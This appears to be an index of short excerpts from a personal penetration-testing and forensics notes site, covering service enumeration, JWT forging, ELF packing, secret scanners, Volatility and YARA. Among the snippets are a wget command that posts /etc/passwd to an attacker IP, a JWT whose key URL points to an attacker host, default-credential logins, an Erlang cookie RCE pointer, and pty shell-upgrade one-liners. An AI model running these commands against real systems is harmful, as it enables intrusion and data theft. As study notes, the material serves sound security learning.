A message broker, written in Erlang. Uses the Erlang Cowboy web server. Notes: Default credentials: guest / guest (work by default only from localhost). A user's password can be changed without the old password on the command line: rabbitmqctl change_password username newpassword. Files with suffix .DCD contain credentials. If you have the Erlang cookie: erl -cookie JPCGJCAEWHPKKPBXBYYB -name rabbit -sname…
Erlang Port Mapper Daemon. Enumeration (mandatory): Check if epmd is running: echo -n -e "\x00\x01\x6e" | nc -vn $target 4369. Check with nmap: nmap -sV -Pn -n -T4 -p 4369 --script epmd-info $target. Brute force the key with https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ and try the RCE.
Listing of all files from a XAMPP for Windows 7.4.6 installation. Look into the phpinfo page; it could reveal usernames.
Post files: wget --post-file=/etc/passwd http://$attacker_ip/. Set output file: wget -O /tmp/s http://...
Use https://jwt.io/ to decode a JWT; it also shows the various parts. A JWT has multiple base64-encoded parts, separated by a dot character. Create a JWT: Create a PEM RSA key: openssl genrsa -out private.pem 2048. Create base64 from header and payload: $ echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.17/private.pem"}' | base64 -w0 | sed 's/+/-/g; s,/,_,g' | sed -E 's/=+$//' =>…
Example of a connection: openssl s_client -connect $target:995 -crlf -quiet. Issues: The following message means that the server and client could not agree on a shared protocol version, probably because the server only supports old TLS versions: 139763095926080:error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol:../ssl/statem/statem_lib.c:1957: Add TLS 1.0 support: openssl s_client -connect $target:995 -crlf -quiet -tls1
Enumeration (mandatory): Try to connect. Start the console: /opt/mysql-shell-8.0.23-linux-glibc2.12-x86-64bit/bin# ./mysqlsh ; then try to connect with default credentials or found ones: MySQL JS > var test_conn = require('mysqlx'); MySQL JS > var session = mysqlx.getSession({host: '192.168.156.58', user: 'root', password: 'root', port: 33060});
Enumeration (mandatory): Check CVE-2020-11651. Note that execution of scheduled tasks can take 5-10 minutes.
Enumeration: Try to just log in; by default, no user is required: mongo $target. Enumerate with NSE scripts: nmap -sV --script "mongo* and default" -p 27017 $target. Try to connect: mongo 'mongodb://nodebb:nodebb@192.168.91.69:27017/nodebb'. Optional: Try https://github.com/codingo/NoSQLMap
Enumeration. Code execution. I am stuck.
Simple protection: A packer can be used to "optimize" / "compress" a binary, which also makes it harder to debug. A packer removes unnecessary information, and the minification can also lead to obfuscation to some extent. A standard tool is UPX. Minimize a binary with upx -9 bin.elf. Advanced protection: Obfuscation…
This post describes methods to transform/obfuscate/minimize Linux ELF files. sstrip: The sections are used for debugging and are not necessary for a program's execution. The command sstrip removes all sections from the file: sstrip bin.elf. Afterwards, it can be verified with readelf --sections bin.elf that there are no sections left in the file.
Concepts: A segment is a piece of information which is mapped into the memory (of a process). An ELF binary can have zero or multiple segments. The segment also defines where the OS should put it into memory. Each segment has a program header which describes the sections within. A section is a distinctive…
Overwrite functions with LD_PRELOAD: The LD_PRELOAD environment variable allows injecting a library which is loaded before the program's libraries. This means that it is possible to redirect the execution flow to an injected function via one's own shared object.
This page collects tools for the Linux Executable and Linking Format (ELF) with some basic commands. checksec.sh: Shows which exploit mitigations a program has (Source): ./checksec.sh --file file.elf. GDB: See the gdb post. Objdump: Objdump shows information about a binary (object) file. Show the assembly code from an ELF file: objdump -d bin.elf. Show all symbols (e.g.…
Mirroring. gittyleaks: Execute the command gittyleaks --find-anything within a local repository. git-secrets: Scans (only) commit messages for sensitive information with git secrets --scan-history. truffleHog: Scans repos and prints out information with a high entropy; execute it with trufflehog $repo_dir. git-secret-scanner: Scans a repo with git-secret-scanner scan -d $git_repo. Other tools…
See also MemProcFS. The forensic memory framework Volatility (version 3 since 2019) offers a wide range of methods to analyse memory. See the blog post "Retrieving memory" for methods and techniques to obtain memory. Start by getting general information about a memory dump: volatility -f image.mem imageinfo. Now use the following commands to get more information:…
Yet Another Ridiculous Acronym (YARA) is a tool for detecting information in binary and text files. YARA rules are written in text files. By calling yara with a rule file and a file to test, it either returns nothing if no rule matched, or one or multiple rules which match the provided file. Example: The following rule…
Malware (Notes are taken from the TryHackMe course.) John von Neumann (!) created a concept of malicious software in 1949. The first implementation was done in 1971 by Bob Thomas. The program Creeper jumped from one system (running the operating system Tenex) to another and just printed a message on each console. The team Nematode is…
Addresses within memory are referenced with @. General: Start by directly analysing all referenced code: r2 -A $file ... e emu.str = true. Start with the debugger enabled (only when I want to execute the program): r2 -AA -e dbg.follow.child=true -e dbg.forks=true -d $file ... e emu.str = true. Fork parameter: If the process forks, the debugger halts. Type…
Personal collection of some infosec stuff. The primary purpose of this site is to collect and organize it for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';